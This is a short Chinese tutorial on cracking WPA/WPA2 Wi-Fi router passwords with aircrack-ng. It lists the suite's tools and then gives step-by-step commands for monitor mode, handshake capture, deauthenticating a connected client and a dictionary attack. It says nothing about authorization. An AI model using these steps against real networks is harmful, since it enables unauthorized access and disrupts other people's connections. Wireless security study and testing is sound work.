aircrack-ng无线路由密码破解
0x01 Aircrack-ng介绍
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站或[1])并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。
aircrack-ng 包包含有:
| Name | Description |
|---|---|
| aircrack-ng | 破解WEP以及WPA(字典攻击)密钥 |
| airdecap-ng | 通过已知密钥来解密WEP或WPA嗅探数据 |
| airmon-ng | 将网卡设定为监听模式 |
| aireplay-ng | 数据包注入工具(Linux和Windows使用CommView驱动程序) |
| airodump-ng | 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息 |
| airtun-ng | 创建虚拟管道 |
| airolib-ng | 保存、管理ESSID密码列表 |
| packetforge-ng | 创建数据包注入用的加密包。 |
| Tools | 混合、转换工具 |
| airbase-ng | 软件模拟AP |
| airdecloak-ng | 消除pcap文件中的WEP加密 |
| airdriver-ng | 无线设备驱动管理工具 |
| airolib-ng | 保存、管理ESSID密码列表,计算对应的密钥 |
| airserv-ng | 允许不同的进程访问无线网卡 |
| buddy-ng | easside-ng的文件描述 |
| easside-ng | 和AP接入点通讯(无WEP) |
| tkiptun-ng | WPA/TKIP攻击 |
| wesside-ng | 自动破解WEP密钥 |
0x02 破解WPA/WPA2加密的无线路由实例
【环境及设备】
windows10、Oracle VM VirtualBox、kali虚拟机、免驱无线网卡一枚【如亮科LK-110】,注意的点是VirtualBox要开启USB2.0支持。
【操作步骤】
第一步
airmon-ng check kill #自动检查冲突程序并强制关闭
第二步
airmon-ng start wlan0 #开启monitor模式
该步骤可能会报错,按照termimal提示的指令解决即可
第三步
airodump-ng wlan0mon #获取附近AP信息
第四步
airodump-ng –bssid BSSID -c CH -w 文件位置 wlan0mon
airodump-ng -c 1 –bssid mac地址 -w ~/Desktop/cap/chaos wlan0mon
第五步【新开terminal】
aireplay-ng -0 1 -a mac地址 -c 客户端mac地址 wlan0mon
-0 为攻击次数 -c 可选
该指令可使连接AP的客户端断掉连接,一旦该客户端尝试重新连接,我们便可以抓取到握手数据包。
如果执行第五步后,第四步的terminal右上角显示handshake: AP的MAC(BSSID),说明已经抓取到了握手数据包,可以使用字典进行下一步的破解。
第六步
aircrack-ng -w ~/Desktop/passwd/passwd.txt ~/Desktop/chaos/chaos-01.cap
其中passwd.txt为密码字典文件
参考资料
https://zh.wikipedia.org/wiki/Aircrack-NG